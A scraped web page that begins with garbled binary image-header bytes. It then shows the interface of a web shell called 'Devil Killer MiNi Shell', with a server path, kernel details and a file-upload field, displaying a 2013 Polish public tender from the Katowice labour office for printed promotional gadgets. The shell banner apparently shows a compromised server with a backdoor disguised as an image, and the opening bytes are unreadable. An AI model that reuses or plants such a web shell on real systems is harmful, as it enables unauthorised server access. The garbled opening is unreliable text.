JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130822/339408-N-2013.html

<p class="kh_header"><b>Katowice: DOSTAWA MATERIAŁÓW PROMOCYJNYCH (GADŻETÓW) Z NADRUKAMI WSKAZUJĄCYMI NA PROGRAM OPERACYJNY KAPITAŁ LUDZKI ORAZ EUROPEJSKI FUNDUSZ SPOŁECZNY</b><br>
<b>Numer ogłoszenia: 339408 - 2013; data zamieszczenia: 22.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW PROMOCYJNYCH (GADŻETÓW) Z NADRUKAMI WSKAZUJĄCYMI NA PROGRAM OPERACYJNY KAPITAŁ LUDZKI ORAZ EUROPEJSKI FUNDUSZ SPOŁECZNY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów promocyjnych (gadżetów) z nadrukami wskazującymi na Program Operacyjny Kapitał Ludzki oraz Europejski Fundusz Społeczny.  

Szczegółowy opis przedmiotu zamówienia:

1.	Długopis metalowy - wykonany z matowego metalu z elementami chromowanymi, w kolorze granatowym i pomarańczowym (wersje kolorystyczne w równej ilości sztuk) wyposażony w przyciskowy mechanizm wysuwania wkładu ze zintegrowanym uchwytem - przycisk w kolorze długopisu, uchwyt chromowany, grubość linii pisma 0,3-0,5 mm, długopis nie krótszy niż 130 mm i nie dłuższy niż 150 mm, grubość bez uchwytu max 11 mm, wkład wymienny koloru niebieskiego, dwa okalające długopis grawery na części chwytu długopisu (w postaci pierścieni okalających długopis wygiętych w strzałkę w górnej części), nadruk w technice laserowej, obejmujący logo Programu Operacyjnego Kapitał Ludzki, flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny i logo Śląskie. Pozytywna Energia - po jednej stronie korpusu oraz adres wskazanej strony internetowej po drugiej stronie korpusu - projekt graficzny do akceptacji przez Zamawiającego. 
Pakowanie jednostkowe (pojedynczy długopis): w folię,
Pakowanie zbiorcze: w karton - po minimum 50 sztuk, na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie
	Ilość: 2000 szt.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowy długopis w Rozdziale II SIWZ

2. 	Torba biurowa na laptopa 15,6:
1.		Wymiar: 310 x 410 x 150 mm (+-5%)
2.	Materiał: Poliester 600D (kodura)
3.	Kolor: Czarny
4.	Parametry techniczne: 
- 	5 kieszeni,
- 	Kieszeń główna wewnątrz torby podzielona na dwie części, w tym jedną wzmocnioną - w kolorze torby, przystosowaną na laptopa, dodatkowo zabezpieczoną rzepem, zapinaną na zamek błyskawiczny, suwak wykonany z metalu w kolorze srebrnym lub innym zaakceptowanym przez Zamawiającego
-	Kieszeń główna zawiera na zewnątrz torby dodatkowy zamek błyskawiczny, pozwalający na zwiększenie powierzchni poprzez jego rozsunięcie, zamek w kolorze torby, suwak wykonany z metalu w kolorze srebrnym lub innym zaakceptowanym przez Zamawiającego
- 	Za kieszenią główną, przy tylnej ściance, kieszeń płaska wyposażona w osobne przegródki na telefon komórkowy oraz na długopisy,
- 	Na zewnętrznej tylnej ściance kieszeń płaska zapinana na zamek błyskawiczny - kieszeń w kolorze torby, suwak wykonany z metalu w kolorze srebrnym lub innym zaakceptowanym przez Zamawiającego
- 	Na przedniej ściance torby znajduje się kieszeń wypukła, mniejsza od kieszeni głównej, zapinana na zamek błyskawiczny - kieszeń w kolorze torby, suwak wykonany z metalu w kolorze srebrnym lub innym zaakceptowanym przez zamawiającego
-	Na przedniej ściance mniejszej kieszeni znajduje się jeszcze jedna kieszeń wypukła, mniejsza od poprzedniej - kieszeń w kolorze torby, zapinana na zamek błyskawiczny, suwak wykonany z metalu w kolorze srebrnym lub innym zaakceptowanym przez Zamawiającego, w dolnej części zewnętrznej kieszeni (wypukłej) przebiega ozdobny pasek z eko-skóry,
- 	Krótkie (wygodne do noszenia w ręce) uchwyty do noszenia torby, wzmocnione paskiem z eko-skóry zapinanym na rzep (łączącym oba uchwyty),
- 	Przy końcach zamka błyskawicznego kieszeni głównej znajdują się srebrne (lub w innym zaakceptowanym przez Zamawiającego kolorze) metalowe uchwyty do przymocowania paska na ramię,
- 	Dodatkowy pasek na ramię - regulowanej długości, wyposażony na końcach 
w srebrne karabińczyki (lub w innym zaakceptowanym przez Zamawiającego kolorze), umożliwiające przypięcie paska do torby,
- 	Na pasku miękka osłona w kolorze torby przeciwdziałająca uciskaniu ramienia,
-	Znakowanie w dolnej części najmniejszej kieszeni (na ozdobnym pasku z eko-skóry):
- nadruk w jednym kolorze,
- układ graficzny znakowania i wymiar do uzgodnienia z Zamawiającym,
- treść: logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, logo Śląskie. Pozytywna Energia oraz adres wskazanej strony internetowej - wykonane w technice trwałej. Na treść nadruku składać mogą się także inne elementy, jak np. dane teleadresowe (wskazane podczas realizacji zamówienia), nie wpływające jednak znacząco na koszt wykonania nadruku.
-	Pakowanie jednostkowe: w folię,
- 	Pakowanie zbiorcze: w karton, na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie.
Ilość - 100 szt.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowa torba w Rozdziale II SIWZ

3.  Antystres serce - serce wykonane z pianki poliuretanowej, wymiary: 7 x 6,5 x 5,5 cm +- 10%, kolor: niebieski lub pomarańczowy, nadruki po obydwu stronach w technice trwałej: z jednej strony logo Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, z drugiej - logo Programu Operacyjnego Kapitał Ludzki. Projekt graficzny nadruku do akceptacji przez Zamawiającego.
Pakowanie zbiorcze: w karton. Na kartonie winna być umieszczona informacja dotycząca przedmiotu oraz ilości sztuk w danym kartonie.
Ilość: 1000 sztuk.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowy antystres w Rozdziale II SIWZ

4. 	Miś maskotka - pluszowa maskotka w postaci siedzącego misia: wysokość 20 cm +- 15%, kolor kremowy - ecri, ubrany w granatową koszulkę (ściągalną), na obu stronach koszulki jednokolorowy nadruk - kolor do uzgodnienia z Zamawiającym, nadruk zawiera: logo Programu Operacyjnego Kapitał Ludzki, flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz logo Śląskie. Pozytywna energia - z jednej strony oraz adres wskazanej strony internetowej - z drugiej strony. 
-	Pakowanie jednostkowe: w folię,
-	Pakowanie zbiorcze: w karton, na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie.
Ilość: 500 sztuk.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowa maskotka w Rozdziale II SIWZ

5.   	 Kubek ceramiczny 
1.	Wysokość: ok. 10 cm (+- 2 cm)
2.	Pojemność : ok. 300 ml (+- 40 ml)
3.	Średnica: 80 x 100 mm (+- 20 mm)
4.	Kolor: biały
- 	Opis: kubek o przekroju kwadratowym (czworoboczny), ścinany z wierzchu (górne brzegi kubka są pochyłe, o pofalowanej powierzchni), z uchwytem, wykonany z wypalanej porcelany w kolorze białym, błyszczący.
-	Nadruk: pełny kolor, umieszczony na dwóch przeciwległych bokach 
(na zewnętrznych ściankach), nadruk zawiera: logo Programu Operacyjnego Kapitał Ludzki, flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, logo Śląskie. Pozytywna energia oraz adres wskazanej strony internetowej. Projekt oraz kolor nadruku do akceptacji przez Zamawiającego.
-	Opakowanie: kubek pakowany jednostkowo - w wysokiej jakości, białym, tekturowym opakowaniu w kształcie graniastosłupa, wielkością dopasowanym do wymiarów kubka, zabezpieczającym kubek przed uszkodzeniem. Pakowanie zbiorcze: w karton, na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie.
Ilość: 500 sztuk.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowy kubek w Rozdziale II SIWZ

6. 	Etui na wizytówki - Wykonane ze skóry ekologicznej lub naturalnej koloru czarnego, mieszczące co najmniej 128 wizytówek o rozmiarach 90 x 50 mm +- 3 mm. Na części zewnętrznej - przedniej etui posiada element metalowy (blaszka), na którym zamieścić można nadruk w technice laserowej, obejmujący: flagę Unii Europejskiej z napisem Unia Europejska Europejski Fundusz Społeczny, logo Programu Operacyjnego Kapitał Ludzki, opcjonalnie: logo Śląskie. Pozytywna energia oraz adres wskazanej strony internetowej. 
Pakowanie jednostkowe: w folię oraz w wysokiej jakości kartonowym opakowaniu.
Pakowanie zbiorcze: w karton, na kartonie winna być umieszczona informacja dotycząca przedmiotu
 i ilości sztuk w danym kartonie.
Ilość: 300 sztuk.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowy wizytownik w Rozdziale II SIWZ

7.	Trójkątny zakreślacz fluorescencyjny - Zakreślacz w kształcie trójkąta równobocznego o boku długości 9 cm (+- 0,5 cm) i grubości nie przekraczającej ok. 2 cm (+- 0,5 cm), wielkość końcówek piszących ok. 4 x 2,5 mm, ściętych pod kątem 30 stopni, produkt w obudowie białej posiadający trzy fluorescencyjne kolory: zielony, żółty, różowy, nadruk w pełnym kolorze obejmujący: logo Programu Operacyjnego Kapitał Ludzki, flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, logo Śląskie. Pozytywna energia - po jednej stronie korpusu oraz adres wskazanej strony internetowej - po drugiej stronie korpusu, projekt graficzny do akceptacji przez Zamawiającego. Każdy zakreślacz zapakowany osobno w folię. Pakowanie zbiorcze: po minimum 50 szt. w kartonowych pudełkach, 
na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie.
Ilość: 500 sztuk.
Przykładowy zakreślacz w Rozdziale II SIWZ

8. 	Płaski brelok o prostokątnym kształcie - Płaski brelok w kształcie prostokąta z białą diodą LED:
1) wymiary: 10 x 2,5 x 1 cm +- 20 %,
2) opis: płaski brelok z tworzywa sztucznego w kształcie prostokąta z białą diodą LED; świeci poprzez ściśnięcie - włączenie chwilowe,
3) kolor: niebieski, ze srebrnymi wykończeniami,
4) z jednej strony zakończony łańcuszkiem z kółkiem (umożliwiającym jego przyczepienie np. do szlufki), łańcuszek i kółko w kolorze srebrnym
5) oznakowanie: flaga Unii Europejskiej z napisem Unia Europejska Europejski Fundusz Społeczny, logo Programu Operacyjnego Kapitał Ludzki, logo Śląskie. Pozytywna energia oraz adres wskazanej strony internetowej. Pakowanie jednostkowe: w folię, Pakowanie zbiorcze: w karton, na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie.
Ilość: 200 sztuk.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowy brelok w Rozdziale II SIWZ

9.  	Przybornik na długopisy - Przybornik na długopisy wykonany z kartonu z surowców wtórnych EKO-EFEKT (z recyklingu) o grubości 2 mm +- 2 mm, koloru beżowego lub kremowego. Przybornik można łatwo złożyć - tak, aby zmieścił się w płaskiej przesyłce, co pozwali na łatwiejszy i tańszy transport. 
Rozmiar przybornika: 75 x 105 x 70 mm +- 15 %
Oznakowanie: flaga Unii Europejskiej z napisem Unia Europejska Europejski Fundusz Społeczny, logo Programu Operacyjnego Kapitał Ludzki, logo Śląskie. Pozytywna energia oraz adres wskazanej strony internetowej. 
Pakowanie jednostkowe: w folię,
Pakowanie zbiorcze: w karton, na kartonie winna być umieszczona informacja dotycząca przedmiotu 
i ilości sztuk w danym kartonie.
Ilość: 500 sztuk.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowy przybornik na długopisy w Rozdziale II SIWZ


10. 	Miarka 2 m - Wielofunkcyjna zwijana miarka 2-metrowa z notesem, długopisem oraz poziomicą. Notes zabezpieczony plastikową przezroczystą klapką, na której zostaną zamieszczone logotypy. Długopis wykonany z plastiku, przymocowany do produktu, wielkością dopasowany do wymiarów produktu 
(tj. długość długopisu nie powinna przekraczać tej części produktu, do której będzie on przymocowany). Produkt o wymiarach 8 x 6 x 3 cm +- 10%, wykonany z plastiku (podstawowy materiał) oraz metalu (dodatkowy materiał).
Oznakowanie: co najmniej flaga Unii Europejskiej z napisem Unia Europejska Europejski Fundusz Społeczny, logo Programu Operacyjnego Kapitał Ludzki.
Pakowanie jednostkowe: w białe kartonowe pudełko, posiadające oznakowanie: flaga Unii Europejskiej 
z napisem Unia Europejska Europejski Fundusz Społeczny, logo Programu Operacyjnego Kapitał Ludzki, logo Śląskie. Pozytywna energia oraz adres wskazanej strony internetowej; projekt graficzny do akceptacji Zamawiającego.
Pakowanie zbiorcze: w kartonie, na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie
Ilość: 500 sztuk.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowa miarka w Rozdziale II SIWZ

11. 	Torba na dokumenty z rączką:
materiał: poliester 600 D (kodura)
wymiary: (około): 35 cm x 30 cm x 8 cm +- 3 cm na każdym z boków
wykończenie: Torba na dokumenty z rączką oraz kieszeń główna zapinana na zamek błyskawiczny
kolor: granatowy - niebieski
Znakowanie w dolnej części torby:
- nadruk w pełnym kolorze,
- układ graficzny znakowania i wymiar do uzgodnienia z Zamawiającym,
- treść: logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, logo Śląskie. Pozytywna Energia oraz adres wskazanej strony internetowej - wykonane w technice trwałej. Na treść nadruku składać mogą się także inne elementy, jak np. dane teleadresowe (wskazane podczas realizacji zamówienia), nie wpływające jednak znacząco na koszt wykonania nadruku.
- 	Pakowanie jednostkowe: w folię,
- 	Pakowanie zbiorcze: w kartonie, na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie
Ilość: 200 sztuk
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowa torba na dokumenty w Rozdziale II SIWZ

12.       Zestaw piśmienniczy:
Zestaw piśmienniczy składający się z plastikowego długopisu oraz pióra wiecznego. Długopis wykonany 
z eleganckiego czarnego plastiku z elementami chromowanymi koloru srebrnego, wyposażony 
w mechanizm przekręcany (tzw. automat), czarny - niebieski wkład. Pióro wykonane z eleganckiego czarnego plastiku z elementami chromowanymi koloru srebrnego. Pióro przystosowane do nabojów atramentowych, stalówka wykonana ze stali nierdzewnej koloru srebrnego, nabój z niebieskim - czarnym atramentem, korpus pióra z nakrywką, długopis i pióro wyposażone w klip chromowany koloru srebrnego. Ekskluzywny zestaw piśmienniczy opakowany w zamykane etui wykonane z eleganckiego plastiku (koloru czarnego ze srebrnym wykończeniem) z elementami skórzanymi eko - skórzanymi oraz białym satynowym wnętrzem o wymiarach: 18 x 7 x 3,5 +-5%
Nadruk w technice laserowej, nadruk jednokolorowy, obejmujący logo Programu Operacyjnego Kapitał Ludzki, flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, logo Śląskie. Pozytywna energia - po jednej stronie korpusu oraz adres wskazanej strony internetowej - po drugiej stronie korpusu; projekt nadruku do akceptacji przez Zamawiającego. Jednokolorowy nadruk (laser - tłoczenie) na etui, obejmujący: logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, logo Śląskie pozytywna energia oraz adres strony internetowej WUP - projekt do akceptacji Zamawiającego. Każde etui zapakowane w folię, po min. 10 sztuk etui w kartonowych pudełkach. 
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Ilość - 200 sztuk.
Materiał: metal + plastik
Wymiary długopisu oraz pióra wiecznego: długość 135 mm +-5%
Wykończenie: długopis z mechanizmem przekręcanym, korpus pióra z nakrywką oraz stalówką wykonaną ze stali nierdzewnej koloru srebrnego, długopis i pióro wyposażone w klip koloru srebrnego
Tusze: w obu przypadkach niebieskie - czarne 
Etui: wykonane z wysokiej jakości plastiku koloru czarnego oraz stalowego lub szarego + skóra - eko - skóra w kolorze czarnym, etui zamykane wyścielone białym satynowym materiałem.
 Przykładowy zestaw piśmienniczy w Rozdziale II SIWZ

13.    Smycz reklamowa - satynowa, kolor pomarańczowy. Smycz zakończona metalowym karabińczykiem o długości ok. 4 cm oraz pętelką na telefon. Szerokość taśmy 1 cm, obwód ok. 85 cm +- 10 cm (liczone od złączki). Smycz z nadrukiem obejmującym: flagę Unii Europejskiej z napisem Unia Europejska Europejski Fundusz Społeczny, logo Programu Operacyjnego Kapitał Ludzki, logo Śląskie. Pozytywna energia oraz adres wskazanej strony internetowej - występujące ze sobą naprzemiennie, ilość powtórzeń nadruku 4-6 razy (projekt do uzgodnienia z Zamawiającym). Nadruk po obu stronach taśmy, druk sublimacyjny, jednokolorowy: biały.
Pakowanie zbiorcze: po minimum 50 szt. w kartonowych pudełkach, na kartonie winna być umieszczona informacja dotycząca przedmiotu i ilości sztuk w danym kartonie.
Ilość - 2 000 sztuk.
Wykonawca pokrywa koszty transportu w przypadku ewentualnych reklamacji.
Przykładowa smycz w Rozdziale II SIWZ

14.    Pendrive - Pamięć USB o pojemności 8 GB, obudowa: wykonana z plastiku, w kształcie spłaszczonej elipsy. Zamknięcie typu scyzoryk. Obudowa pendrive w kolorze granatowym lub pomarańczowym, zamknięcie w kolorze srebrnym. Rozmiar: 5,5 x 2 x 1 cm (+- 10 %). Nadruk: jednokolorowy, wykonany w technice trwałej, zawierający logo Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, logo Programu Operacyjnego Kapitał Ludzki - po obu szerokich stronach USB, projekt graficzny nadruków do akceptacji przez Zamawiającego.
Każdy pendrive zapakowany osobno w folię oraz w kartonik. Pakowanie zbiorcze: po minimum 100 szt. w kartonowych pudełkach, na kartonie winna być umieszczona informacja dotycząca przedmiotu, koloru oraz ilości sztuk w danym kartonie.
Gwarancja producenta oraz Wykonawcy zamówienia na wszystkie elementy produktu - nie krótsza, niż 12 miesięcy. Wykonawca pokrywa również koszty transportu w przypadku ewentualnych reklamacji.
Ilość - 200 sztuk.
Przykładowy Pendrive w Rozdziale II SIWZ

Uwagi ogólne:
-	Logotypy oraz treść informacji umieszczonych na materiałach informacyjno-promocyjnych Zamawiający przekaże w wersji elektronicznej, w ciągu 3 dni roboczych od podpisania umowy.
-	W przypadku braku technicznej możliwości zastosowania na poszczególnych materiałach wszystkich wymaganych logotypów, Zamawiający zastrzega sobie prawo do modyfikacji ich liczby.
-	Wykonawca przedstawi wzory wykonanych materiałów informacyjno-promocyjnych 
w formacie PDF do akceptacji Zamawiającego. Zamawiający w terminie 5 dni roboczych od ich otrzymania dokona akceptacji przedstawionych przez Wykonawcę wzorów materiałów, bądź naniesienie ewentualne uwagi, które Wykonawca zobowiązany będzie uwzględnić.
-	Zamówione materiały zostaną dostarczone do siedziby Zamawiającego na koszt Wykonawcy. Dostarczenie materiałów nastąpi w dni robocze (od poniedziałku do piątku) w godzinach: 8.00 - 14.00.
Po stronie Wykonawcy leżeć będzie sporządzenie protokołu zdawczo - odbiorczego 
(w dwóch egzemplarzach) i dostarczenie go wraz z zamówionymi materiałami do siedziby Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w.w warunku, jeżeli Wykonawca wykaże, 
iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 1 dostawę o wartości nie mniejszej niż 39 000,00 zł, której przedmiotem zamówienia była dostawa materiałów promocyjnych (gadżetów) z nadrukami.

	Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia w.w warunku według formuły spełnia-nie spełnia na podstawie załączonego do oferty wykazu zawierającego dostawę wykonaną w okresie ostatnich trzech lat przed upływem terminu składania ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą w/w przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której była lub jest świadczona, datą jej realizacji, przedmiotu, wartości oraz załączeniem dokumentu lub dokumentów potwierdzających, że dostawa wymieniona 
w wykazie została wykonana lub jest wykonywana należycie (np. referencje). 

Dokument lub dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Nie wykazanie spełnienia w.w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

